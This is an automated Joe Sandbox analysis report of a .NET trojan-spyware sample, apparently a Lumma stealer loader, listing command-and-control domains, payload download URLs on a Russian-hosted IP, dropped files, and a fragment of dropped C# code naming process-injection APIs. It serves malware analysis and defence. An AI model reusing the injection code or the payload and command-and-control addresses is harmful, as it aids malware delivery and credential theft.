https://marshal-zhukov.com:443/apiK	RegAsm.exe, 00000005.00000002.2210665581.0000000003130000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000002FFB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store.steampowered.com/;	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.cloudflare.steamstatic.com/	RegAsm.exe, 00000005.00000002.2209577928.0000000000C30000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
147.45.44.131	unknown	Russian Federation	2895	FREE-NET-ASFREEnetEU	true
188.114.96.3	marshal-zhukov.com	European Union	13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1555620
Start date and time:	2024-11-14 08:07:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	nlJ2sNaZVi.exe renamed because original name is a hash value
Original Sample Name:	5e443f31b2cf8b956afec50ad5c0f839.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@8/7@11/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 47 Number of non-executed functions: 95
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: nlJ2sNaZVi.exe

Simulations

Behavior and APIs

Time	Type	Description
02:08:19	API Interceptor	1x Sleep call for process: nlJ2sNaZVi.exe modified
02:08:22	API Interceptor	8x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
147.45.44.131	TZ33WZy6QL.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/infopage/tbg9.exe
	7IXl1M9JGV.exe	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/bhdh552.ps1
	Rechnung_643839483.pdf.lnk	Get hash	malicious	Unknown	Browse	147.45.44.131/infopage/cdeea.exe
	file.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gqgqg.exe
	AS5AB7c08n.exe	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
	ptgl503.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/gpto03.exe
	Suselx1.exe	Get hash	malicious	LummaC	Browse	147.45.44.131/files/g5.exe
	gkqg90.ps1	Get hash	malicious	LummaC	Browse	147.45.44.131/files/otqp9.exe
	test.bat	Get hash	malicious	MicroClip	Browse	147.45.44.131/files/tpgl053.exe
188.114.96.3	Item-RQF-9456786.exe	Get hash	malicious	Unknown	Browse	www.rtpwslot888gol.sbs/7arg/
	Yeni sipari#U015f _TR-59647-WJO-001.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	paste.ee/d/lmTya
	View Pdf Doc_1c854e0875fca437af9ba7046d2f6712.htm	Get hash	malicious	Unknown	Browse	zy8wq.nhgrt.top/DydymQ/31zY8wQ31?&&r4n=Z2FicmllbGUuY29uZ2Vkb0BnZi5jb20%3D
	View Pdf Doc_8a3c334133bfb9605fc344b2f764ac62.htm	Get hash	malicious	Unknown	Browse	4je3f.nhgrt.top/V0afhB/154jE3f15?&&wVd=dGFoZXIubWFuc29vckB5YXNtYXJpbmEuYWU%3D
	8dPlV2lT8o.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php
	7ObLFE2iMK.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	UMwpXhA46R.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	1fWgBXPgiT.exe	Get hash	malicious	Simda Stealer	Browse	lysyvan.com/login.php
	arxtPs1STE.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php
	Z8eHwAvqAh.exe	Get hash	malicious	Simda Stealer	Browse	qegyhig.com/login.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
marshal-zhukov.com	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC, Stealc	Browse	188.114.96.3
steamcommunity.com	Loader.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.67.133.187
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	23.67.133.187
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.210.122.61
	file.exe	Get hash	malicious	LummaC	Browse	23.197.127.21
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	LummaC	Browse	23.192.247.89
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.192.247.89

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	Order88983273293729387293828PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	01. MT JS JIANGYIN Ship Particulars.xlsx.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.12.205
	file.exe	Get hash	malicious	LummaC	Browse	104.21.80.55
	file.exe	Get hash	malicious	LummaC	Browse	172.67.174.133
	file.exe	Get hash	malicious	Unknown	Browse	162.159.135.233
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	172.64.41.3
	ESTEEM ASTRO PARTICULARS.pdf.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	CStealer	Browse	162.159.134.233
AKAMAI-ASUS	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	184.28.89.167
	qkbfi86.elf	Get hash	malicious	Mirai	Browse	23.219.94.247
	dvwkja7.elf	Get hash	malicious	Mirai	Browse	96.16.0.147
	http://bit.ly/UCEMPL	Get hash	malicious	Unknown	Browse	2.19.225.207
	sbafla - John Bradley your alert(s) workspace - to review - 11132024.msg	Get hash	malicious	Unknown	Browse	2.19.126.160
	https://deltacapitalgroup.us11.list-manage.com/track/click?u=bf383f7aa25923d377aaa8ae2&id=d3424d590b&e=95f75804b2	Get hash	malicious	Unknown	Browse	104.102.19.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.47.51.183
	Launcher 1.0.0.exe	Get hash	malicious	Unknown	Browse	23.47.51.164
	Demande de proposition du Groupe Esp#U00e9rance et Cancer[45838].pdf	Get hash	malicious	Unknown	Browse	96.6.160.189
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	23.47.50.136
FREE-NET-ASFREEnetEU	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	147.45.47.61
	file.exe	Get hash	malicious	Clipboard Hijacker	Browse	147.45.47.61
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	147.45.47.61
	file.exe	Get hash	malicious	Unknown	Browse	147.45.47.61
	file.exe	Get hash	malicious	Unknown	Browse	147.45.47.61
	fefbBqMKcU.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.44.212
	yh5At5T1Zs.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	147.45.44.212
	arm7.elf	Get hash	malicious	Unknown	Browse	193.233.193.45
	Pr6Fu6VZK3.exe	Get hash	malicious	Unknown	Browse	147.45.47.61
	Pr6Fu6VZK3.exe	Get hash	malicious	Unknown	Browse	147.45.47.61

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 188.114.96.3
	uu8v4UUzTU.exe	Get hash	malicious	Unknown	Browse	104.102.49.254 188.114.96.3
	c39-EmprisaMaldoc.rtf	Get hash	malicious	Unknown	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, Vidar	Browse	104.102.49.254 188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254 188.114.96.3

Process:	C:\Users\user\Desktop\nlJ2sNaZVi.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	847
Entropy (8bit):	5.345615485833535
Encrypted:	false
SSDEEP:	24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
MD5:	EEEC189088CC5F1F69CEE62A3BE59EA2
SHA1:	250F25CE24458FC0C581FDDF59FAA26D557844C5
SHA-256:	5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
SHA-512:	2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Temp\RESBEB5.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Nov 14 09:05:52 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1336
Entropy (8bit):	3.96465342191833
Encrypted:	false
SSDEEP:	24:Hcim9p4QPHFwKTFexmfwI+ycuZhNOkakShpPNnqSSd:UVPGKTAxmo1ulOka3hLqSC
MD5:	FFA178C533324E44D32C7CB21CD41888
SHA1:	6CFF474AA3DC237DA9CF5366B866B3FFB348ED0A
SHA-256:	65E8828DBF35A9ACDE8A814AD7C7751C477F4A69D5A7BE4D50A7597C8D6A1115
SHA-512:	B45E23E65F07560FBED9BAFA28FB0633312B080E0825544C5D49A346DD0617A8772579F493C76D0F1A2DAD88317E6918120DD22907C0B91E682E8769A8F9CDC0
Malicious:	false
Reputation:	low
Preview:	L...p.5g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP..................o...qY9.l................5.......C:\Users\user\AppData\Local\Temp\RESBEB5.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

C:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.080307436975029
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryETkak7YnqqlTpPN5Dlq5J:+RI+ycuZhNOkakShpPNnqX
MD5:	6F941DFC715939186CF6BEEA089ADF87
SHA1:	2241C1BFCA44329F5368A40FB75CC85AD08304B4
SHA-256:	B2B01414E097AFC217392FECF35670B99C6DBD336AB6AAE287170C54A05F5A9B
SHA-512:	7D0E9A87F79319CD06E43EC57B2FBCBEFF002D27AFC290B471E60C82B9F860021314F0FA7A71ECF782ED5655F39CF69D6A676F943FF79920481420843D1472AE
Malicious:	false
Reputation:	low
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...v.0.t.1.l.0.c.o...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs

Download File

Process:	C:\Users\user\Desktop\nlJ2sNaZVi.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	10583
Entropy (8bit):	4.487855797297623
Encrypted:	false
SSDEEP:	192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
MD5:	B022C6FE4494666C8337A975D175C726
SHA1:	8197D4A993E7547D19D7B067B4D28EBE48329793
SHA-256:	D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
SHA-512:	DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
Malicious:	true
Reputation:	low
Preview:	.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline

Download File

Process:	C:\Users\user\Desktop\nlJ2sNaZVi.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	206
Entropy (8bit):	4.9655435506699055
Encrypted:	false
SSDEEP:	3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAI4iUjQ+iQCIFRVRMxTPIUkh4E2J5v:pAu+H2L/6K2923f4fM+zxszI923f4f09
MD5:	DE34C14306794294EFD27B3DEDE59A38
SHA1:	2D6C87CADBFB645279AD6F3BB3243BBC07FF15CB
SHA-256:	87BBE4520E8501598B24625360568F3318904A276E67B6717C26165914B6506E
SHA-512:	A93B674443268CD9ACE58754129C1699E649280B13107185C78DF61F6F2DB151C8747F26C3ED5D691365B2491463DB14B36EFF0A5DFBC2F7A4E9B702309DDA49
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs"

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	4.659432177901728
Encrypted:	false
SSDEEP:	192:0CaQHf9WDa/u6YRj2ca4Uxd5Mq5eNcU9h:3WDlV95x05MqIyU9h
MD5:	28F9F326DCC6DE0877CA6330BF37E9E5
SHA1:	3D49623193D2EA4C6A2A85E4E599656E1AE1FDDD
SHA-256:	3C53B96D796C75AB88F6D1E084C6B407ED63F5ACBA26B22722546B7D1A2F3CD7
SHA-512:	2E61452F5433BDED7BC724FE0B9F6F07E9D55D698348CA46EAE05C166F3F7EAA6CF3F2C2C69B2325DDDB2683F991EE4A1D231507F38B16831F3A3A1B4768248B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p.5g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(...."..(......(.......0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p.....(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.out

Download File

Process:	C:\Users\user\Desktop\nlJ2sNaZVi.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	705
Entropy (8bit):	5.212788285979691
Encrypted:	false
SSDEEP:	12:KMi/qR37L/6KzT+wmKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6Kz/mKax5DqBVKVrdFAMBJTH
MD5:	01B221337C0A0BF1C3638F0757EB0ED1
SHA1:	02DC9D211E61C33C88DCC33B97DA6BBD176D25B0
SHA-256:	FB15AED4CC6A6E7457FE8FD3F8BBB47B197069431F94E4BB6C714A6F2460755D
SHA-512:	0E68F51D7AD6E8DA90B72E212F89EDFB7FE82C12CED00C1BF09DAE431706811C22DB066DE7BFEE10896934089026FD03E802660798575359872CA9273BA170A0
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	3.896660573459071
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	nlJ2sNaZVi.exe
File size:	45'056 bytes
MD5:	5e443f31b2cf8b956afec50ad5c0f839
SHA1:	206caac0c2d6e47246f0c3df16fa5c72172e6bfd
SHA256:	abe7949458ebfbdb53ad04c602bca49e30f346431b730a005c0ff3c59e06538e
SHA512:	9d180624e9ab617756f52cba7507bc9427f2d1d96871ea3cb14e26cd89ff9f5df3198d7d5caa66f423865e534c5cacfce4dc5686ddf11b16d6f843615117a6e3
SSDEEP:	768:+FtchgNSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4feOq:+FtggN7aeGEk+11Tu9AnQVLNppvk9RND
TLSH:	2313595171FE9029D5BBEBB5BEDDACEDD89E5971182C246700C1928B4B21FE0EA43C34
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j-..........."...0.............j.... ........@.. ....................... ............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x40c36a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xBE2D6ACE [Sun Feb 8 18:58:22 2071 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc318	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xe000	0x610	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xc2fc	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa370	0xa400	3a0f4275f7ed8a4a02795d06bfe395df	False	0.24054401676829268	data	3.9111563002235537	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x610	0x800	92aaf4a55736a28d9c609716b869d82d	False	0.31884765625	data	3.4591587823885317	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	4bb8e39b7134c57236ea10a8dfe65823	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe090	0x380	data			0.39285714285714285
RT_MANIFEST	0xe420	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

